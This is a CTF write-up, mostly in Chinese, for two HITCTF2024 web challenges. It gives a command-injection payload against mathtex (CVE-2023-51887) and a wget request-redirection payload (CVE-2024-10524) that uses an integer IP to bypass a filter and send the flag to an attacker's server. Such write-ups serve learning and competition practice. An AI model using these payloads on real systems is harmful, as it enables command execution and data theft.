HITCTF2024 Writeup

Web

mathtex

1. /mathtex路由：

@app.get('/mathtex')
def tex():
    t = request.args.get('latex')
    with open('in.tex', 'w') as f:
        f.write(t)
        ^^^^^^^^^^
 Open an interactive python shell in this frame
    os.system('timeout 1 mathtex -f in.tex -o out')
 
    return send_file('out.gif')
 
TypeError: write() argument must be str, not None

2. 搜索找到mathtex的CVE-2023-51887：Fuzzing mathtex - Yulun/blog
3. 可以使用\which{;$anycommand}来实现任意命令执行
4. Payload：url/mathtex?latex=\which{;cd$IFS..;cd$IFS..;cd$IFS..;cd$IFS..;ls}f(x)%3Dx%5E2
   
5. Lilac: flag{d316f371ce774780}

wget

1. / 路由下给出了源码如下：

from flask import Flask, request, render_template, jsonify 
import subprocess 
import os 
import base64 
app = Flask(__name__) 
FLAG = os.getenv("FLAG", "flag{}") 
flag_base64 = base64.urlsafe_b64encode(FLAG.encode()).decode() 
print(f"FLAG: {flag_base64}")
@app.route("/") 
def index(): 
    with open(__file__, "r") as file: 
        source_code = file.read() 
        return source_code 
        
@app.route("/execute", methods=["POST"]) 
def execute(): 
    auth = request.form.get("auth") 
    if not auth: 
		    return jsonify({"error": "auth is required"}), 401 
    if any(char in "`!@#$%&*()-=+;.[]{}<>\\|;'\"?/" for char in auth): 
        return jsonify({"error": "Hacker!"}), 400 
    try: 
        command = ["wget", f"{auth}@127.0.0.1:5000/{flag_base64}"] 
        subprocess.run(command, check=True) 
        return jsonify({"message": "Command executed successfully"}) 
    except Exception as e: 
        return jsonify({"error": "Command failed"}), 500 

if __name__ == "__main__": app.run(host="0.0.0.0", port=5000)

2. 利用wget的CVE-2024-10524：NVD - CVE-2024-10524
3. 用整数表示ip绕过符号过滤，即可劫持请求到输入的服务器
4. 对/execute路由POSTPayload：auth=737152360:aaa
5. 目标服务器抓包得到flag
   
6. base64解码得到 flag{keEP_4N_eYe_0n_ReCEN7_cVe}